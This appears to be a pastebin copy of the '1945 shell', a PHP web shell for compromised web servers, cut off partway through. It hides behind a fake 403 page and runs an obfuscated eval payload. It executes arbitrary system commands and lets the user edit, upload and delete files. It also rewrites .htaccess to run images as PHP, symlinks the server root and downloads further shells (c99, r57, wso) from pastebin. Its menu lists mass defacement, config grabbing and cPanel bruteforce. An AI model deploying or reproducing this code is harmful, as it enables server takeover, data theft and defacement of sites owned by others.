· 5 years ago · Jul 21, 2020, 05:54 PM
1<?php
2// 1945 shell , c0ded by : shutdown57
3// for update : http://pastebin.com/ZA04jg7A
4// more info : www.withoutshadow.org | wos-linuxers.blogspot.com
5// contact : woslinuxers57799@gmail.com
6// LIMITED AND COMPRESSED EDITION
7
8error_reporting(0);
9set_time_limit(0);
10session_start();
11
12$s57_paswot = "2d00f43f07911355d4151f13925ff292";//default password : 1945
13
14$alert="<script>
15window.location.href='?45=".$_GET['act']."';
16</script>";
17@define('judul', 'freedom is real - 1945');
18@define('icons', 'http://www.animatedimages.org/data/media/781/animated-indonesia-flag-image-0013.gif');
19@define('icon_folder','<img src="data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=">');
20@define('icon_file','<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=">');
21
22
23if(!isset($_SESSION['fz'])){
24 $fz="13";
25}else{
26 $fz=$_SESSION['fz'];
27}
28if(!isset($_SESSION['bg'])){
29 $bg="#000000";
30}else{
31 $bg=$_SESSION['bg'];
32}
33if(!isset($_SESSION['col'])){
34 $col="#FF0000";
35}else{
36 $col=$_SESSION['col'];
37}
38if(!isset($_SESSION['pcol'])){
39 $pcol="";
40}else{
41 $pcol=$_SESSION['pcol'];
42}
43if(isset($_SESSION['responsive'])){
44 $resmod='<a href="?act='.$_GET['45'].'&mobile_off='.$_GET['45'].'">[ON]</a>';
45}else{
46 $resmod='<a href="?act='.$_GET['45'].'&mobile='.$_GET['45'].'">[OFF]</a>';
47}
48if(isset($_POST['submitfz'])){
49 $_SESSION['fz']=$_POST['fz'];
50 echo"<meta http-equiv='refresh' content='0;URL=?font-size=".$_SESSION['fz']."'>";
51}
52if(isset($_POST['submitbg'])){
53 $_SESSION['bg']=$_POST['bgcolor'];
54 echo"<meta http-equiv='refresh' content='0;URL=?bgcolor=".$_SESSION['bg']."'>";
55}
56if(isset($_POST['submitcol'])){
57 $_SESSION['col']=$_POST['color'];
58 echo"<meta http-equiv='refresh' content='0;URL=?font-color=".$_SESSION['col']."'>";
59}
60if(isset($_POST['submitpc'])){
61 $_SESSION['pcol']=$_POST['pcolor'];
62echo"<meta http-equiv='refresh' content='0;URL=?public-font-color=".$_SESSION['pcol']."'>";
63}
64function shutdown57_login() {
65echo"
66<title> Forbidden</title>
67</head><body>
68<div id='forbid'>
69<h1>Forbidden</h1>
70
71<p>You don't have permission to access ".$_SERVER['REQUEST_URI']." on this server.<br>
72Server unable to read htaccess file, denying access to be safe
73<br><br>
74Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p></div>";
75
76if($_GET['login']=='1945'){
77
78 echo'
79<style>
80body{
81background:#000;
82backgroud-size:100%;
83}
84input{
85text-align:center;
86border-top:3px solid #f00;
87border-left:3px solid #f00;
88border-bottom:3px solid #fff;
89border-right:3px solid #fff;
90background:transparent;
91color:#333;
92}
93input:hover{
94transition-duration:0.5s;
95-o-transition-duration:0.5s;
96-moz-transition-duration:0.5s;
97-webkit-transition-duration:0.5s;
98border-style:dashed;
99cursor:pointer;
100}
101#forbid{
102 display:none;
103}
104table{
105 margin-top:200px;
106}
107</style>
108<center>
109<form method="post">
110<table title="selamat datang '.$_SERVER['REMOTE_ADDR'].' di 1945 shell ">
111<tr><td colspan=2><h1 style="color:red;text-shadow:2px 3px 5px #fff;"><center>[ 1945 ]</h1><br><font color=white> <center>"WELCOME <b>'.$_SERVER['REMOTE_ADDR'].'</b> TO 1945 shell at '.$_SERVER['HTTP_HOST'].' "</font></td></tr>
112<tr><td><font color=red size=5 face=courier new> Username :</font></td><td>
113<input type="text" value="WithOutShadow" title="you can\'t change this username." disabled></td></tr>
114<tr><td><font color=white size=5 face=courier new>Password :</font></td><td>
115<input type="password" name="pass" ></td></tr>
116<tr><td colspan=2><input type="submit" value="login!" style="width:100%;color:white;"></td></tr>
117</table>
118<footer style="bottom:0;left:0;position:fixed;color:#fff">powered by withoutshadow </footer>
119 </center>
120 ';
121}
122 exit;
123}
124
125
126if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
127 if( empty( $s57_paswot ) ||
128 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $s57_paswot) ) )
129 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
130 else
131 shutdown57_login();
132
133 @eval(str_rot13(gzinflate(str_rot13(base64_decode("ZqjKK6vUQ89XV6ssWMzILldaMzU3t7RnKAGJ6xUkSKnrqFSnFaUnpSqklRZISSoYTZqYxgIFPVwjFawU1PVH4t2CXD2DXKPVUN3dneNQndzc1XD11PWRclyDXDyC3NzjPVzDQGUKzn5hYV5BroEQA4A2xifnpXIlpeupAw3OK6wqWGcoVlcqqSwCO0DTGgA=")))));
134 //@mail('woslinuxers57799@gmail.com','[setor shell 1945]','URL : '.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].' PASSWORD : '.$s57_paswot.'','admin@google.com');
135
136?>
137<!DOCTYPE html>
138<html>
139<head>
140 <title>.[ <?=judul;?> ].</title>
141 <link rel="shortcut icon" href="<?=icons;?>">
142 <?php
143 if(isset($_SESSION['responsive'])){
144 echo $_SESSION['responsive'];
145 }
146 ?>
147</head>
148<body>
149<style type="text/css">
150*{
151 font-size:<?=$fz;?>;
152 color:<?=$pcol;?>;
153 font-family:arial;
154}
155body{background:<?=$bg;?>;color:<?=$col;?>;}
156a{color:#eee;text-decoration: none;}
157a:hover{color:#f00;border-bottom: 1px solid #fff;}
158input,option,select{color: #f00;border:1px solid #eee;background:transparent;}
159textarea{width:80%;height: 500px;background: #000;color: #f00;border:1px solid #eee;}
160textarea:hover,input:hover,option:hover,select:hover{border:1px solid #f00;color: #eee;}
161table{border-collapse: collapse;}
162.tbl_exp{width: 100%;border-collapse: collapse;border:0;font-size: 14px;margin-bottom: 100px;}
163.hover:hover{background: #333;}
164.hover{border-bottom: 1px solid grey;}
165.header #right{text-align:right;float: right;}
166.header #left{text-align: left;float: left;}
167#viewimg{margin-top:150px;text-align: center;}
168#thead{background: #f00;color: #fff;}
169.code{border: 1px solid #fff;width: 80%;text-align: left;font-size: 13px;}
170.header{width: 100%;}
171</style>
172
173<table class="header">
174<tr><td>
175<?php
176
177if(!function_exists('posix_getegid')) {
178 $user = @get_current_user();
179 $uid = @getmyuid();
180 $gid = @getmygid();
181 $group = "?";
182} else {
183 $uid = @posix_getpwuid(posix_geteuid());
184 $gid = @posix_getgrgid(posix_getegid());
185 $user = $uid['name'];
186 $uid = $uid['uid'];
187 $group = $gid['name'];
188 $gid = $gid['gid'];
189}
190$sm= ini_get('safe_mode') ? "<font color=lime> ON<?font>" : "<font color=grey> OFF</font>";
191$mysql= function_exists('mysql_connect')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
192$url_fp =ini_get('url_fopen')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
193$curl=function_exists('curl_init')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
194$df=ini_get('disable_functions') ? substr(ini_get('disable_functions'),0,50).",etc..." : "<font color=grey> NONE</font>";
195echo "
196<div id='left'>
197<pre style='font-size:13px;'>
198SERVER SOFTWARE : ".$_SERVER['SERVER_SOFTWARE']."
199UNAME : ".php_uname()."
200HOSTNAME : ".$_SERVER['HTTP_HOST']."
201IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." | YOUR IP : ".$_SERVER['REMOTE_ADDR']."
202User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")
203PHP version : ".phpversion()."-[<a href='?act=".getcwd()."&phpinfo=busuK_tampilanNya_kembali_aja'>PHPINFO</a>]
204CURL:".$curl."|safemode:".$sm."|URL FOPEN:".$url_fp."|MySQL:".$mysql."
205DISABLE FUNCTIONS :".$df."
206current dir :";
207if(isset($_GET['45'])){
208 $d=$_GET['45'];
209}else{
210 if(isset($_GET['act'])){
211$d=$_GET['act'];
212}else{
213$d=getcwd();
214
215}
216}
217$d=str_replace('\\','/',$d);
218$path = explode('/',$d);
219
220foreach($path as $id=>$curdir){
221if($curdir == '' && $id == 0){
222$a = true;
223echo '<a href="?45=/">/</a>';
224continue;
225}
226if($curdir == '') continue;
227echo '<a href="?45=';
228for($i=0;$i<=$id;$i++){
229echo "$path[$i]";
230if($i != $id) echo "/";
231}
232echo '">'.$curdir.'</a>/';
233}
234$pwd=str_replace('\\','/',getcwd());
235(is_writable($d))?$stat="<font color=lime>WRITABLE</font>" :$stat="<a style='color:grey' href='?act=".$_GET['45']."¬w=".$_GET['45']."'>NOT WRITABLE</a>";
236
237?>
238~[<?php echo $stat;?>][<a href="?45=<?php echo $pwd; ?>">home</a>][<a href="javascript:history.go(-1);">back</a>]
239</div>
240</td><td>
241<div id='right'>
242<center>
243--<[<a href="?act=<?php echo $d;?>&about=<?php echo $d;?>">1945 SHELL</a>|<a href="?act=<?=$d;?>&theme=<?=$d;?>">THEMES</a>|<a href="?act=logout">LOGOUT</a>]--[
244</center>
245<br>
246[<a href="?act=<?php echo $d;?>&newfile=<?php echo $d;?>">Newfile</a>]
247[<a href="?act=<?php echo $d;?>&mkdir=<?php echo $d;?>">NewDir</a>]
248[<a href="?act=<?php echo $d;?>&shell=<?php echo $d;?>">Shell</a>]
249[<a href="?act=<?php echo $d;?>&conf=<?php echo $d;?>">config grab</a>]
250[<a href="?act=<?php echo $d;?>&admfind=<?php echo $d;?>">Admin finder</a>]
251<br>
252[<a href="?act=<?php echo $d;?>&upload=<?php echo $d;?>">Upload</a>]
253[<a href="?act=<?php echo $d;?>&unzip=<?php echo $d;?>">Unzip file</a>]
254[<a href="?act=<?php echo $d;?>&stringtools=<?php echo $d;?>">String Tools</a>]
255[<a href="?act=<?php echo $d;?>&kuchiyose=<?php echo $d;?>">Kuchiyose no jutsu</a>]
256[<a href="?act=<?php echo $d;?>©=<?php echo $d;?>">Copy</a>]
257<br>
258[<a href="?act=<?php echo $d;?>&ctools=<?php echo $d;?>">Create tools</a>]
259[<a href="?act=<?php echo $d;?>&mail=<?php echo $d;?>">Mail sender</a>]
260[<a href="?act=<?php echo $d;?>&massdeface=<?php echo $d;?>">Mass deface</a>]
261[<a href="?act=<?php echo $d;?>&zoneh=<?php echo $d;?>">Zone-H</a>]
262[<a href="?act=<?php echo $d;?>&cpbrute=<?php echo $d;?>">cPanel bruteforce</a>]
263<br><br>
264<form method="get">
265Go to dir:<input type="text" name="45" value="<?php echo $d;?>" style="width:250px">
266<input type="submit" value=">>">
267</form>
268</div>
269</td></tr></table>
270<?php
271
272if(isset($_GET['act'])){
273 //Kuchiyose tools
274$k=array(
275 'adminer'=>"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php",
276 'wso'=>"http://pastebin.com/raw/N0eh3Q7Y",
277 'whmcs'=>"http://pastebin.com/raw/TjiXt4r1",
278 'bejak'=>"http://pastebin.com/raw/sQJVES6y",
279 'terminal'=>'http://pastebin.com/raw/2ADSfZYk',
280 'pastebin'=>'http://pastebin.com/raw/RCbhjsXJ',
281 'indoxploit_shell'=>'http://pastebin.com/raw/nC6pWh5a',
282 'andela'=>'http://pastebin.com/raw/0dkmjaWJ',
283 'injection'=>'http://pastebin.com/raw/znH7r6Jr',
284 'sbh'=>'http://pastebin.com/raw/SMDJVTF8',
285 'bh'=>'http://pastebin.com/raw/3L2ESWeu',
286 'jkt48'=>'http://pastebin.com/raw/TujADXPn',
287 'c99'=>'http://pastebin.com/raw/Ms0ptnpH',
288 'r57'=>'http://pastebin.com/raw/S9tzBgg3',
289 );
290function kuchiyose($url, $isi) {
291 $fp = fopen($isi, "w");
292 $ch = curl_init();
293 curl_setopt($ch, CURLOPT_URL, $url);
294 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
295 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
296 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
297 curl_setopt($ch, CURLOPT_FILE, $fp);
298 return curl_exec($ch);
299 curl_close($ch);
300 fclose($fp);
301 ob_flush();
302 flush();
303 }
304 if($_GET['kuchiyose']=='adminer'){
305if(file_exists('1945_adminer.php')){
306 echo" done!! => <a href='1945_adminer.php' target='_blank'>click here</a>";
307 }else{
308 if(kuchiyose($k['adminer'],'1945_adminer.php')){
309 echo"done!! --> <a href='1945_adminer.php' target='_blank'>click here..</a>";
310 }else{
311 echo" failed!! check your connection!";
312 }
313 }
314}elseif($_GET['notw']){
315if(chmod($_GET['notw'],0777)){
316 echo"<script>
317 alert('chmod successfull..');
318 window.location.href='?45=".$_GET['notw'];
319}else{
320 echo"
321 <script>
322 alert('gagal CHMOD Directory :( ');
323 </script>";
324}
325}elseif ($_GET['kuchiyose']=='wso') {
326 if(file_exists('1945_wso.php')){
327 echo" done!! => <a href='1945_wso.php' target='_blank'>click here</a>";
328 }else{
329 if(kuchiyose($k['wso'],'1945_wso.php')){
330 echo"done!! --> <a href='1945_wso.php' target='_blank'>click here..</a>";
331 }else{
332 echo" failed!! check your connection!";
333 }
334 }
335}elseif ($_GET['kuchiyose']=='whmcs') {
336 if(file_exists('1945_whmcs.php')){
337 echo" done!! => <a href='1945_whmcs.php' target='_blank'>click here</a>";
338 }else{
339 if(kuchiyose($k['whmcs'],'1945_whmcs.php')){
340 echo"done!! --> <a href='1945_whmcs.php' target='_blank'>click here..</a>";
341 }else{
342 echo" failed!! check your connection!";
343 }
344 }
345}elseif ($_GET['kuchiyose']=='bejak') {
346if(file_exists('1945_b374k.php')){
347 echo" done!! => <a href='1945_b374k.php' target='_blank'>click here</a>";
348 }else{
349 if(kuchiyose($k['bejak'],'1945_b374k.php')){
350 echo"done!! --> <a href='1945_b374k.php' target='_blank'>click here..</a>";
351 }else{
352 echo" failed!! check your connection!";
353 }
354 }
355}elseif ($_GET['kuchiyose']=='bypass_shell') {
356 $isi="\n Addhandler application/x-httpd-php .jpg";
357
358 $fp=fopen('.htaccess','a+');
359 if(fwrite($fp,$isi)){
360 if(rename($_SERVER['SCRIPT_FILENAME'],"1945.jpg")){
361 echo"
362 <script>
363 alert('berhasil kakak!!');
364 window.location.href='1945.jpg'
365 </script>";
366 }
367 }
368 fclose($fp);
369}elseif ($_GET['kuchiyose']=='terminal') {
370if(file_exists('1945_b374k.php')){
371 echo" done!! => <a href='1945_terminal.php' target='_blank'>click here</a>";
372 }else{
373 if(kuchiyose($k['terminal'],'1945_terminal.php')){
374 echo"done!! --> <a href='1945_terminal.php' target='_blank'>click here..</a>";
375 }else{
376 echo" failed!! check your connection!";
377 }
378 }
379}elseif ($_GET['kuchiyose']=='pastebin') {
380if(file_exists('1945_pastebin.php')){
381 echo" done!! => <a href='1945_pastebin.php' target='_blank'>click here</a>";
382 }else{
383 if(kuchiyose($k['pastebin'],'1945_pastebin.php')){
384 echo"done!! --> <a href='1945_pastebin.php' target='_blank'>click here..</a>";
385 }else{
386 echo" failed!! check your connection!";
387 }
388 }
389}elseif ($_GET['kuchiyose']=='indoxploit_shell') {
390if(file_exists('1945_indoXploit_shell.php')){
391 echo" done!! => <a href='1945_indoXploit_shell.php' target='_blank'>click here</a>";
392 }else{
393 if(kuchiyose($k['indoxploit_shell'],'1945_indoxploit_shell.php')){
394 echo"done!! --> <a href='1945_indoxploit_shell.php' target='_blank'>click here..</a>";
395 }else{
396 echo" failed!! check your connection!";
397 }
398 }
399}elseif ($_GET['kuchiyose']=='andela') {
400if(file_exists('1945_andela.php')){
401 echo" done!! => <a href='1945_andela.php' target='_blank'>click here</a>";
402 }else{
403 if(kuchiyose($k['andela'],'1945_andela.php')){
404 echo"done!! --> <a href='1945_andela.php' target='_blank'>click here..</a>";
405 }else{
406 echo" failed!! check your connection!";
407 }
408 }
409}elseif ($_GET['kuchiyose']=='injection') {
410 if(file_exists('1945_1n73ction.php')){
411 echo" done!! => <a href='1945_1n73ction.php' target='_blank'>click here</a>";
412 }else{
413 if(kuchiyose($k['injection'],'1945_1n73ction.php')){
414 echo"done!! --> <a href='1945_1n73ction.php' target='_blank'>click here..</a>";
415 }else{
416 echo" failed!! check your connection!";
417 }
418 }
419}elseif ($_GET['kuchiyose']=='sbh') {
420 if(file_exists('1945_sbh.php')){
421 echo" done!! => <a href='1945_sbh.php' target='_blank'>click here</a>";
422 }else{
423 if(kuchiyose($k['sbh'],'1945_sbh.php')){
424 echo"done!! --> <a href='1945_sbh.php' target='_blank'>click here..</a>";
425 }else{
426 echo" failed!! check your connection!";
427 }
428 }
429}elseif ($_GET['kuchiyose']=='bh') {
430 if(file_exists('1945_bh.php')){
431 echo" done!! => <a href='1945_bh.php' target='_blank'>click here</a>";
432 }else{
433 if(kuchiyose($k['bh'],'1945_bh.php')){
434 echo"done!! --> <a href='1945_bh.php' target='_blank'>click here..</a>";
435 }else{
436 echo" failed!! check your connection!";
437 }
438 }
439}elseif ($_GET['kuchiyose']=='jkt48') {
440 if(file_exists('1945_jkt48.php')){
441 echo" done!! => <a href='1945_jkt48.php' target='_blank'>click here</a>";
442 }else{
443 if(kuchiyose($k['jkt48'],'1945_jkt48.php')){
444 echo"done!! --> <a href='1945_jkt48.php' target='_blank'>click here..</a>";
445 }else{
446 echo" failed!! check your connection!";
447 }
448 }
449}elseif ($_GET['kuchiyose']=='c99') {
450 if(file_exists('1945_c99.php')){
451 echo" done!! => <a href='1945_c99.php' target='_blank'>click here</a>";
452 }else{
453 if(kuchiyose($k['c99'],'1945_c99.php')){
454 echo"done!! --> <a href='1945_c99.php' target='_blank'>click here..</a>";
455 }else{
456 echo" failed!! check your connection!";
457 }
458 }
459}elseif ($_GET['kuchiyose']=='r57') {
460 if(file_exists('1945_r57.php')){
461 echo" done!! => <a href='1945_r57.php' target='_blank'>click here</a>";
462 }else{
463 if(kuchiyose($k['r57'],'1945_r57.php')){
464 echo"done!! --> <a href='1945_r57.php' target='_blank'>click here..</a>";
465 }else{
466 echo" failed!! check your connection!";
467 }
468 }
469}
470elseif ($_GET['kuchiyose']=='root') {
471system('ln -s / 1945~.txt');
472$fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
473$file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Mauritania = symlink("/","1945~.txt");
474$rt="<br><a href='1945~.txt' TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
475berhasil kakak! touch me senpai..</b></font></a></center>";
476echo "<center><br><br><b>Done.. !</b><br>".$rt;
477echo "</form>";
478}
479elseif(isset($_GET['rmdir'])){
480 //membuat fungsi penghapusan folder yang di dalamNya ada file dan folder kosong :)
481 //c0ded by : alinko
482 function rmdir_unlink_rmdir($d){
483 if(!rmdir($d)){
484 $s=scandir($d);
485 foreach ($s as $ss) {
486 if(is_file($d."/".$ss)){
487 if(unlink($d."/".$ss)){
488 rmdir($d);
489
490 }
491 }
492 if(is_dir($d."/".$ss)){
493 rmdir($d."/".$ss);
494 rmdir($d);
495
496 }
497 }
498 }
499 }
500 if(rmdir_unlink_rmdir($_GET['rmdir'])){
501 echo $alert;
502 }else{
503 echo $alert;
504 }
505}elseif(isset($_GET['rm'])){
506 $rm=$_GET['rm'];
507 if(unlink($rm)){
508 echo $alert;
509 }
510}elseif(isset($_GET['rename'])){
511 echo"
512 <br><br><br><br>
513 <center>
514 <form method='post' >
515 <p>Old name : ".basename($_GET['rename'])."</p>
516 NewName :
517 <input type='text' name='newname' value='".$_GET['rename']."'><input type='submit' value='>>'>
518 </form>";
519 if(isset($_POST['newname'])){
520 $oldname=$_GET['rename'];
521 $newname=$_POST['newname'];
522 if(rename($oldname,$newname)){
523 echo $alert;
524 }
525 }
526}elseif (isset($_GET['edit'])) {
527 echo"
528 <center>
529 <form method='post' >
530 <textarea name='edit'>".htmlspecialchars(file_get_contents($_GET['edit']))."</textarea>
531 <br>
532 <input type='text' name='editdir' value='".$_GET['edit']."' style='width:350px'><input type='submit' name='editsave' value='save' >
533 </form>";
534 if(isset($_POST['editsave'])){
535 $fp=fopen($_POST['editdir'],'w');
536 if(fwrite($fp,$_POST['edit'])){
537 echo"<br> saved@".date('D M Y');
538 }
539 fclose($fp);
540 }
541}elseif (isset($_GET['chmod'])) {
542 echo"<center>
543 <h3>: change permission files :</h3>
544 <form method='post' >
545 Permission :
546 <input type='text' name='perms' value='".fileperms($_GET['chmod'])."'><input type='submit' value='>>'>
547 </form>";
548 if(isset($_POST['perms'])){
549 if(chmod($_GET['chmod'],$_POST['perms'])){
550 echo'Permission changed! <a href="javascript:history.go(-1)">back</a>';
551 }
552 }
553}elseif (isset($_GET['src'])) {
554
555echo'
556<table>
557<tr><td>[<a href="?act='.$_GET['act'].'&edit='.$_GET['src'].'">edit</a>]</td><td>
558[<a href="?act='.$_GET['act'].'&rm='.$_GET['src'].'">delete</a>]</td><td>
559[<a href="?act='.$_GET['act'].'&rename='.$_GET['src'].'">rename</a>]</td><td>
560[<a href="?act='.$_GET['act'].'&chmod='.$_GET['src'].'">chmod</a>]</td><td>
561[<a href="?act='.$_GET['act'].'&download='.$_GET['src'].'">download</a>]</td></tr></table>
562<center>
563<h3>: View file :</h3>
564<p>Current file: <font color=white>'.$_GET['src'].'</font></p>
565';
566 $src=$_GET['src'];
567 $get_basename=basename($src);
568 $a=preg_match('/.jpg/',$get_basename);
569 $b=preg_match('/.png/',$get_basename);
570 $c=preg_match('/.gif/',$get_basename);
571 $cwd=str_replace('\\','/',getcwd());
572 $plc=str_replace($cwd,'',$src);
573
574 if($c||$b||$a){
575 echo"
576 <br>
577 <center>
578 <img src='".$plc."' id='viewimg' />";
579 }else{
580 $f=$_GET['src'];
581 $file = wordwrap(file_get_contents($f),160,"\n",true);
582 $a= highlight_string($file,true);
583 $old = array("0000BB","000000","FF8000","DD0000", "007700");
584 $new = array("81FF00","e1e1e1", "333333", "ffffff" , "FF8000");
585 $a= str_ireplace($old,$new, $a);
586 $result = $a;
587
588 echo'
589
590 <pre class="code">'.$result.'</pre>';
591}
592}elseif (isset($_GET['upload'])) {
593 if(isset($_POST['upfile'])){
594 $files = array(
595 '1' => $_FILES['files']['name'],
596 '2' => $_FILES['files2']['name'],
597 '3' => $_FILES['files3']['name'],
598 '4' => $_FILES['files4']['name'],
599 '5' => $_FILES['files5']['name']
600 );
601 $tmp= array(
602 '1' => $_FILES['files']['tmp_name'],
603 '2' => $_FILES['files2']['tmp_name'],
604 '3' => $_FILES['files3']['tmp_name'],
605 '4' => $_FILES['files4']['tmp_name'],
606 '5' => $_FILES['files5']['tmp_name']
607 );
608 $dir=array(
609 '1' => $_POST['dir']."/",
610 '2' => $_POST['dir2']."/",
611 '3' => $_POST['dir3']."/",
612 '4' => $_POST['dir4']."/",
613 '5' => $_POST['dir5']."/"
614 );
615 if(move_uploaded_file($tmp['1'],$dir['1'].$files['1'])){
616echo"<br>uploaded -->".$dir['1'].$files['1'];
617 }
618 if(move_uploaded_file($tmp['2'],$dir['2'].$files['2'])) {
619 echo"<br> uploaded --> ".$dir['2'].$files['2'];
620 }
621 if(move_uploaded_file($tmp['3'],$dir['3'].$files['3'])){
622 echo"<br>uploaded --> ".$dir['3'].$files['3'];
623 }
624 if(move_uploaded_file($tmp['4'],$dir['4'].$files['4'])){
625 echo"<br>uploaded --> ".$dir['4'].$files['5'];
626 }
627 if(move_uploaded_file($tmp['5'],$dir['5'].$files['5'])){
628 echo"<br>uploaded --> ".$dir['5'].$files['5'];
629 }
630
631 echo"<br>
632 <font color=white>Success... berhasil dengan tamvanz :)</font>";
633}
634if(is_writable($_GET['upload'])){
635 $stat='<font color="lime">Writable(bisa)</font>';
636}else{
637 $stat='<font color="grey">Not Writable(gak bisa)</font>';
638}
639 ?>
640 <center>
641 <h3>: MultiUpload Files :</h3>
642 <p> status upload file : <?php echo $stat;?></p>
643 <font color=white>NB : kosongkan jika tidak perlu </font>
644 <table border=1><tr><td>file</td><td>Target Dir</td></tr>
645 <tr><td>
646 <form method="Post" enctype="multipart/form-data">
647 <input type="file" name="files" ></td><td>
648 <input type="text" name="dir" value="<?php echo $_GET['upload']; ?>" >
649 </td></tr><tr><td>
650 <input type="file" name="files2" ></td><td>
651 <input type="text" name="dir2" value="<?php echo $_GET['upload']; ?>" >
652 </td></tr><tr><td>
653 <input type="file" name="files3" ></td><td>
654 <input type="text" name="dir3" value="<?php echo $_GET['upload']; ?>" >
655 </td></tr><tr><td>
656 <input type="file" name="files4" ></td><td>
657 <input type="text" name="dir4" value="<?php echo $_GET['upload']; ?>" >
658 </td></tr><tr><td>
659 <input type="file" name="files5"></td><td>
660 <input type="text" name="dir5" value="<?php echo $_GET['upload']; ?>">
661</td></tr></table>
662<br>
663 <input type="submit" name="upfile" class="btn btn-primary" value="upload all">
664
665 </form>
666 </center>
667 <?php
668}elseif (isset($_GET['mkdir'])) {
669 echo'
670 <center>
671<h3>: New Directory :</h3>
672 <form method="post">
673 newdir:<input type="text" name="mkdir" value="'.$_GET['mkdir'].'/newdir" style="width:200px;">
674 <input type="submit" value=">>">
675 </form>';
676 if(isset($_POST['mkdir'])){
677 if(mkdir($_POST['mkdir'])){
678 echo $alert;
679 }
680 }
681}elseif (isset($_GET['newfile'])) {
682echo'
683 <center>
684<h3>: Newfile :</h3>
685 <form method="post">
686 <textarea name="newfile"> </textarea>
687 <br>
688 save :<input type="text" name="saveas" value="'.$_GET['newfile'].'/new.php" style="width:60%">
689 <input type="submit" value=">>" name="subfile">
690 </form><br><br><br>';
691 if(isset($_POST['subfile'])){
692 $fp=fopen($_POST['saveas'],'w');
693 if(fwrite($fp,$_POST['newfile'])){
694 echo $alert;
695 }
696 fclose($fp);
697 }
698}elseif (isset($_GET['shell'])) {
699 echo'
700 <center>
701<fieldset style="border-collapse:collapse;height:500px;">
702<legend>Terminal</legend>
703 <form method="post">
704 <div style="float:left;text-align:left">
705 '.$user.'@<font color=white>'.$_SERVER['HTTP_HOST'].'</font><font color=lime> '.$_GET['shell'].'</font> #:<input type="text" name="command" style="border:0;width:400px;max-width:relative;">
706 </div>
707 </form>';
708 if(isset($_POST['command'])){
709 if(function_exists('shell_exec')){
710 $cmd=shell_exec($_POST['command']);
711 }else{
712 if(function_exists('exec')){
713 $cmd=exec($_POST['command']);
714 }else{
715 if(function_exists('system'));
716 $cmd=system($_POST['command']);
717 }
718 }
719 echo'
720 <br>
721
722 <textarea style="color:lime;text-align:left;width:100%;height:90%;border:0;resize:none;" readonly>
723 '.$cmd.'</textarea></fieldset>';
724 }
725}elseif (isset($_GET['admfind'])) {
726?>
727<center>
728<h3>: admin finder :</h3>
729<form method="POST" action="">
730site :
731<input type="text" name="url" style="width:260px" value="http://"/>
732
733<input type="submit" name="submit" value="find[!]" />
734</p>
735<br>
736<br>
737
738<?php
739
740function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
741 if($strip_tags) {
742 $data = strip_tags($data, $allowed_tags . "<b>");
743 }
744
745 if(stripos($data, "script") !== false) {
746 $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES));
747 } else {
748 $result = htmlentities($data, ENT_QUOTES);
749 }
750
751 return $result;
752}
753function urlExist($url)
754{
755 $handle = curl_init($url);
756 if (false === $handle)
757 {
758 return false;
759 }
760 curl_setopt($handle, CURLOPT_HEADER, false);
761 curl_setopt($handle, CURLOPT_FAILONERROR, true);
